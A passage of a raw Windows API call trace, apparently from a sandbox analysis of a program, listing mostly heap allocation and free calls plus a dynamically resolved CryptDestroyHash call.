HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.589] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0060 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0070 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416490 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.592] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.592] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0165.593] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.593] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2de8 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.593] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.594] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.594] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.594] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.595] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.595] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0165.595] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0165.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.596] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0165.596] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2466db0, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0165.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0165.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0165.597] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0165.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0165.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0165.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.597] CryptDestroyHash (hHash=0xaa56a0) returned 1 [0165.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0165.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0165.597] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa370 [0165.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa520 [0165.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0165.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa778 [0165.598] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0080 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa718 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a48 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0165.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3a0 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa520 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2416270 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa730 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0165.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6b8 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa490 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3b8 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0165.600] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0130 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3b8 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00f0 [0165.600] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0165.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 